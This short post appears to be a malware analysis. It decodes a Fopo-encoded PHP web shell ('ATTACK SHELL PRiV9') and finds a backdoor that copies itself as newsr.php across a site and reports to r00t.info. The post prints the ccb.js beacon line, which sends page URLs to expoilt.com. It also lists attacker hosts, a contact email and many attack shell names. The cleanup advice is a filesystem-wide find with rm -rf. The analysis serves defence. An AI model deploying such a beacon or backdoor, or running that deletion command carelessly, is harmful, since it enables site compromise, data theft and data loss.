I decided to decode a PHP web shell that encoded by Fopo online encoder, it called "ATTACK SHELL PRiV9" or "K2ll33d Shell 2019" belong to "r00t.info".
PHP web shell:
Encoded source:
it might be interesting to you what we encounter!?
as you see it contains backdoor malware that copies itself with newsr.php in all directory of the website and sends a location and info to the address "http://r00t.info/ccb.js" and the mail: "byhero44@gmail.com" with the password "a4cd2905b660e8b1bc73a7c4571252da" that encrypted with the MD5 algorithm.
ccb.js contain:
a=new/**/Image();a.src='http://www.expoilt.com/yaz.php?a='+escape(location.href);
I changed all Http to Hxxp to prevent execute and harm your system, so if you want to run you need to back values to the original.
another name and address are:
Turkey Cyber Army team
https://expoilt.com/yaz.php?a=
http://r00t.info/txt/lamer.txt
k2ll33d
Indoxploit Shell
Sym Bypass 403 Shell
Berandal Indoxploit Shell V2.1
Premium Wso Shell
Whmcs Killer
Mobile Shell V.05 2018 Private
K2ll33d Shell
3turr ~ Sh311
Server V-8 Attack Shell
Bypass shell
Wordpress Mass Change Password 2019
Smevk_pathan Shell V3 Bypass Shell
Leaf Php Mailer V.2.7
Bloodsecurity Bypass Shell
Anon Priv9 Shell
Wso Shell
R00t.info Priv7 Shell New 2016
Wso Shell 4.2.2
G5 Private Bypass Shell
If you have used it, You need to know that your entire website is infected.
the solution to clean:
Look for "newsr.php" files on all of your directory website to remove it.
if you are using Linux use this command:
find / -name newsr.php -exec rm -rf {} \;Also, if you have uploaded the file, delete it completely.
And even delete the CGI shell files that it created by the PHP web shell.
you can find full source code at https://pastebin.com/bmrrDeAb
